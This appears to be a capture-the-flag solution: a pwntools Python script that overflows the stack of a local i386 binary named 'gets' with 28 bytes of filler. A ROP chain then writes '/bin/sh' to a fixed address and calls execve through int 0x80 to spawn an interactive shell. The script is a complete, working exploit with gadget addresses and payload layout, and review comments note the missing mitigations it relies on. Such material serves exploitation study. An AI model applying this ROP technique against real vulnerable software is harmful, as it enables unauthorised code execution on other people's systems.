Tags: pwn 


```python
#!/usr/bin/python
from pwn import *

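# Start the target binary locally; all I/O below goes through this tube.
r = process('./gets')

# The ELF handle is not used below. Loading it makes pwntools log the
# binary's checksec summary, which shows which mitigations are enabled.
elf = ELF('./gets')

# Hard-coded gadget addresses. They are only valid if the binary is mapped at
# a fixed base and the gadgets live in the binary itself.
# NOTE(review): presumably a statically linked, non-PIE i386 build. Confirm
# against the checksec output.
gadget = 0x080549db # mov dword ptr [edx], eax ; ret
popeax = 0x080b81c6 # pop eax ; ret
popedx = 0x0806f02a # pop edx ; ret
popedcbx = 0x0806f050 # pop edx ; pop ecx ; pop ebx ; ret
int0x80 = 0x0806cc25 # int 0x80
# Writable scratch address that receives the "/bin/sh" string. The original
# note calls it a stack address, but it is a fixed address.
# NOTE(review): likely a static data section. Confirm with the section headers.
mem = 0x80ea060

# Everything is built as bytes: p32() returns bytes on Python 3, so mixing in
# str literals raises TypeError there. Bytes literals behave the same on
# Python 2.
payload = b"".join([
    # Filler up to the saved return address.
    # NOTE(review): a fixed 28-byte offset suggests no stack canary sits in
    # between, and the binary name suggests an unbounded gets() read. Confirm.
    # A bounded read plus stack protector and PIE would break this chain.
    b"A" * 28,

    # Write-what-where #1: [mem] = "/bin"
    p32(popedx), p32(mem),
    p32(popeax), b'/bin',
    p32(gadget),

    # Write-what-where #2: [mem+4] = "/sh\0"
    p32(popedx), p32(mem + 4),
    p32(popeax), b'/sh\x00',
    p32(gadget),

    # Syscall setup: edx = 0, ecx = 0, ebx = mem (path pointer)
    p32(popedcbx), p32(0), p32(0), p32(mem),
    # eax = 0xb, the i386 Linux syscall number for execve
    p32(popeax), p32(0xb),
    p32(int0x80),
])

# Wait for the first newline from the program, then send the payload as one line.
r.sendlineafter(b'\n', payload)
r.interactive()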
```